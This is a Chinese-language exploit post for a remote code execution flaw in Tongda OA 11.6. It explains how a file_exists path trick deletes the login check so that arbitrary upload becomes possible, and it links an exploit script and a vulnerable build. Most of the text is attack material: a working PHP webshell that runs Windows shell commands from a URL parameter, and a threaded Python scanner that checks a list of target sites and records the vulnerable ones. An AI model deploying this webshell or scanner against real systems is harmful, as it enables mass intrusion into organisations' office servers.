通达OA 11.6 RCE 漏洞(含EXP,POC,环境)
漏洞环境下载:http://www.kxdw.com/soft/23114.html
漏洞EXP:https://github.com/TomAPU/poc_and_exp/blob/master/rce.py
漏洞POC:见文末(其实也简单就是验证/module/appbuilder/assets/print.php 此文件存不存在。)
漏洞EXP利用原理
根据exp构造了上传文件名和内容 {‘FILE1’: (‘hack.php’, payload)}
同时利用file_exists函数的漏洞构造/.<>./.<>./.<>./ 逃逸出来
也就是说在这里构造访问上传后
file_exists判断存在将文件加_拼接目录移动到根目录下并删除原文件
总体的根据exp分析 首先存在了任意文件删除漏洞
然后删除登陆校验文件,进而导致任意文件上传漏洞
组合之后也就是现在的rce漏洞
利用漏洞不要直接打EXP会导致网站出现问题。(会成为这个样子=。=)
EXP直接在代码里修改target和payload就好。上传的文件名也可在代码中修改。
payload的一些马可能无法执行命令,此马可顺利执行命令。
<?php $command=$_GET['a']; $wsh = new COM('WScript.shell'); $exec = $wsh->exec("cmd /c ".$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?>
POC:
存在/module/appbuilder/assets/print.php此文件(会出现如下界面。也会跳转url)
POC代码,只需要验证文件是否存在就好,是否返回状态码是200。
#!/usr/bin/enc python # _*_ coding: utf-8 _*_ import requests import os import sys import threading from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) file = str(sys.argv[1]) write = sys.argv[2] duwenjian = open(file , 'r' , encoding='UTF-8') xiewenjian = open(write , 'w') ff = duwenjian.readlines() def webhttp(): for line in ff: try: line = line.rstrip("\n") payload = "/module/appbuilder/assets/print.php" url = line + payload qingqiu = requests.get(url, verify=False, timeout=1) zhuangtai = qingqiu.status_code if zhuangtai == 200 : print(url) xiewenjian.write(url) xiewenjian.write('\n') else : pass except OSError: pass def main(): f = threading.Thread(target=webhttp) f.start() f.join() duwenjian.close() xiewenjian.close() if __name__=="__main__": main()